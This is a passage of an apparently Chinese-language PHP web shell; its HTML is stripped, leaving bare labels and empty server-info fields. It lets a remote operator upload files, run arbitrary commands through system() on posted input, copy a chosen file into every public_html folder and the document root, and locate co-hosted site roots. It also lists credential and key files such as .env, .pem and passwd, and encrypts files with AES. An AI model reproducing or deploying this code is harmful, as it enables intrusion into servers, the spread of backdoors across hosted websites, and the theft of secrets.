$tmp) {
if ($_FILES['file']['error'][$i] === UPLOAD_ERR_OK) {
$target = $current_path . '/' . basename($_FILES['file']['name'][$i]);
if (move_uploaded_file($tmp, $target))
$message = '✓ 文件上传成功
';
}
}
} elseif ($action === 'deploy' && isset($_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
if (file_exists($file) && !is_dir($file)) {
$targets = [];
// 扫描所有子目录查找可能的网站根目录
$it = new RecursiveDirectoryIterator($doc_root, RecursiveDirectoryIterator::SKIP_DOTS);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $f) {
if ($f->isDir() && basename($f) == 'public_html') {
$targets[] = $f->getPathname();
}
}
$targets[] = $doc_root; // 主根目录
$count = 0;
foreach ($targets as $target) {
$dest = $target . '/' . basename($file);
if (copy($file, $dest)) $count++;
}
$message = '✓ 已部署到 ' . $count . ' 个网站根目录
';
}
} elseif ($action === 'mass_copy' && isset($_GET['file'], $_GET['dest'])) {
$file = $current_path . '/' . basename($_GET['file']);
$dest_dir = $_GET['dest'];
if (file_exists($file) && !is_dir($file) && is_dir($dest_dir)) {
$dest = $dest_dir . '/' . basename($file);
if (copy($file, $dest))
$message = '✓ 文件复制成功
';
}
} elseif ($action === 'find_websites') {
$website_roots = [];
$it = new RecursiveDirectoryIterator('/', RecursiveDirectoryIterator::SKIP_DOTS);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::SELF_FIRST);
$count = 0;
foreach ($files as $file) {
if ($file->isDir() && (basename($file) == 'public_html' || basename($file) == 'www' || basename($file) == 'htdocs')) {
$website_roots[] = $file->getPathname();
$count++;
if ($count >= 20) break; // 限制数量
}
}
$_SESSION['website_roots'] = $website_roots;
$message = '✓ 找到 ' . count($website_roots) . ' 个网站根目录
';
} elseif ($action === 'file_audit') {
$sensitive_files = [];
$patterns = [
'/config\.php$/i',
'/\.env$/i',
'/database\.php$/i',
'/settings\.php$/i',
'/config\.json$/i',
'/\.pem$/i',
'/\.key$/i',
'/passwd$/i',
];
$it = new RecursiveDirectoryIterator($current_path, RecursiveDirectoryIterator::SKIP_DOTS);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file) {
if (!$file->isDir()) {
foreach ($patterns as $pattern) {
if (preg_match($pattern, $file->getFilename())) {
$sensitive_files[] = $file->getPathname();
break;
}
}
}
}
if (!empty($sensitive_files)) {
$msg = '敏感文件扫描结果:
';
foreach ($sensitive_files as $file) {
$relative = str_replace($current_path . '/', '', $file);
$msg .= htmlspecialchars($relative) . '
';
}
$msg .= '
';
$message = $msg;
} else {
$message = '✓ 未发现敏感文件
';
}
} elseif ($action === 'backdoor_check') {
$suspicious = [];
$patterns = [
'/eval\(/i',
'/base64_decode\(/i',
'/system\(/i',
'/exec\(/i',
'/shell_exec\(/i',
'/passthru\(/i',
'/popen\(/i',
'/proc_open\(/i',
'/assert\(/i',
'/create_function\(/i',
];
$it = new RecursiveDirectoryIterator($current_path, RecursiveDirectoryIterator::SKIP_DOTS);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file) {
if (!$file->isDir() && preg_match('/\.(php|php3|php4|php5|phtml)$/i', $file->getFilename())) {
$content = file_get_contents($file->getPathname());
foreach ($patterns as $pattern) {
if (preg_match($pattern, $content)) {
$suspicious[] = $file->getPathname();
break;
}
}
}
}
if (!empty($suspicious)) {
$msg = '可疑文件检测:
';
foreach ($suspicious as $file) {
$relative = str_replace($current_path . '/', '', $file);
$msg .= htmlspecialchars($relative) . '
';
}
$msg .= '
';
$message = $msg;
} else {
$message = '✓ 未发现可疑文件
';
}
} elseif ($action === 'file_backup' && isset($_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
if (file_exists($file) && !is_dir($file)) {
$backup_name = $current_path . '/' . basename($file) . '.backup_' . date('Ymd_His');
if (copy($file, $backup_name))
$message = '✓ 备份创建成功:' . basename($backup_name) . '
';
}
} elseif ($action === 'restore_backup' && isset($_GET['file'])) {
$backup = $current_path . '/' . basename($_GET['file']);
if (file_exists($backup) && !is_dir($backup) && strpos($backup, '.backup_') !== false) {
$original = preg_replace('/\.backup_\d{8}_\d{6}$/', '', $backup);
if (copy($backup, $original))
$message = '✓ 恢复成功
';
}
} elseif ($action === 'quick_edit') {
$files = isset($_POST['files']) ? explode("\n", trim($_POST['files'])) : [];
$search = $_POST['search'] ?? '';
$replace = $_POST['replace'] ?? '';
$count = 0;
foreach ($files as $file) {
$file = trim($file);
if (!$file) continue;
$full_path = $current_path . '/' . basename($file);
if (file_exists($full_path) && !is_dir($full_path)) {
$content = file_get_contents($full_path);
$new_content = str_replace($search, $replace, $content);
if ($new_content !== $content) {
file_put_contents($full_path, $new_content);
$count++;
}
}
}
if ($count > 0) {
$message = '✓ 批量替换完成,共修改 ' . $count . ' 个文件
';
}
} elseif ($action === 'file_analyze' && isset($_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
if (file_exists($file) && !is_dir($file)) {
$content = file_get_contents($file);
$lines = count(file($file));
$chars = strlen($content);
$words = str_word_count($content);
$size = filesize($file);
$message = '文件分析:
' .
'行数:' . $lines . '
' .
'字符数:' . $chars . '
' .
'单词数:' . $words . '
' .
'文件大小:' . $size . ' 字节
' .
'最后修改:' . date('Y-m-d H:i:s', filemtime($file)) . '
';
}
} elseif ($action === 'create_symlink' && isset($_GET['target'], $_GET['link'])) {
$target = $current_path . '/' . basename($_GET['target']);
$link = $current_path . '/' . basename($_GET['link']);
if (file_exists($target) && !file_exists($link)) {
if (symlink($target, $link))
$message = '✓ 符号链接创建成功
';
}
} elseif ($action === 'file_compress' && isset($_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
if (file_exists($file) && !is_dir($file)) {
$content = file_get_contents($file);
$compressed = gzcompress($content, 9);
file_put_contents($file . '.gz', $compressed);
$message = '✓ 文件压缩完成,压缩率:' .
round((1 - strlen($compressed) / strlen($content)) * 100, 2) . '%
';
}
} elseif ($action === 'file_decompress' && isset($_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
if (file_exists($file) && !is_dir($file) && substr($file, -3) === '.gz') {
$compressed = file_get_contents($file);
$decompressed = gzuncompress($compressed);
$new_file = substr($file, 0, -3);
file_put_contents($new_file, $decompressed);
$message = '✓ 文件解压完成
';
}
} elseif ($action === 'batch_rename_pattern' && isset($_POST['pattern'], $_POST['files'])) {
$pattern = $_POST['pattern'];
$files = explode("\n", trim($_POST['files']));
$count = 0;
foreach ($files as $file) {
$file = trim($file);
if (!$file) continue;
$old = $current_path . '/' . basename($file);
if (file_exists($old)) {
$new_name = preg_replace($pattern, '', basename($file));
if ($new_name !== basename($file)) {
$new = $current_path . '/' . $new_name;
if (!file_exists($new)) {
rename($old, $new);
$count++;
}
}
}
}
if ($count > 0) {
$message = '✓ 批量重命名完成,共处理 ' . $count . ' 个文件
';
}
} elseif ($action === 'file_encrypt_aes' && isset($_GET['file'], $_GET['key'])) {
$file = $current_path . '/' . basename($_GET['file']);
$key = $_GET['key'];
if (file_exists($file) && !is_dir($file) && function_exists('openssl_encrypt')) {
$content = file_get_contents($file);
$iv = openssl_random_pseudo_bytes(16);
$encrypted = openssl_encrypt($content, 'AES-256-CBC', hash('sha256', $key, true), 0, $iv);
file_put_contents($file . '.aes', $iv . $encrypted);
$message = '✓ AES加密完成
';
}
} elseif ($action === 'file_decrypt_aes' && isset($_GET['file'], $_GET['key'])) {
$file = $current_path . '/' . basename($_GET['file']);
$key = $_GET['key'];
if (file_exists($file) && !is_dir($file) && substr($file, -4) === '.aes' && function_exists('openssl_decrypt')) {
$data = file_get_contents($file);
$iv = substr($data, 0, 16);
$encrypted = substr($data, 16);
$decrypted = openssl_decrypt($encrypted, 'AES-256-CBC', hash('sha256', $key, true), 0, $iv);
$new_file = substr($file, 0, -4);
file_put_contents($new_file, $decrypted);
$message = '✓ AES解密完成
';
}
} elseif ($action === 'generate_password') {
$length = isset($_GET['length']) ? intval($_GET['length']) : 12;
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|;:,.<>?';
$password = '';
for ($i = 0; $i < $length; $i++) {
$password .= $chars[random_int(0, strlen($chars) - 1)];
}
$_SESSION['generated_password'] = $password;
$message = '✓ 密码生成成功:' . htmlspecialchars($password) . '
';
} elseif ($action === 'save_settings' && isset($_POST['settings'])) {
$settings = json_decode($_POST['settings'], true);
$_SESSION['shell_settings'] = $settings;
$message = '✓ 设置保存成功
';
} elseif ($action === 'delete' && isset($_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
if (file_exists($file)) {
if (is_dir($file)) {
rmdir($file) ? $message = '✓ 目录已删除
' : $message = '✗ 删除失败
';
} else {
unlink($file) ? $message = '✓ 文件已删除
' : $message = '✗ 删除失败
';
}
}
} elseif ($action === 'edit' && isset($_POST['content'], $_GET['file'])) {
$file = $current_path . '/' . basename($_GET['file']);
file_put_contents($file, $_POST['content']);
$message = '✓ 保存成功
';
} elseif ($action === 'exec' && isset($_POST['cmd'])) {
ob_start();
system($_POST['cmd']);
$output = ob_get_clean();
$message = '' . htmlspecialchars($output) . '
🏠 根目录';
$cumulative = '';
foreach ($parts as $part) {
if (empty($part)) continue;
$cumulative .= '/' . $part;
echo '
/' . htmlspecialchars($part) . '';
}
?>
📤
上传文件
📁
新建目录
🔍
搜索文件
✅
全选文件
⬇️
批量下载
PHP版本:
服务器:
操作系统:
内存限制:
上传限制:
最大执行时间:秒
GD库:
OpenSSL: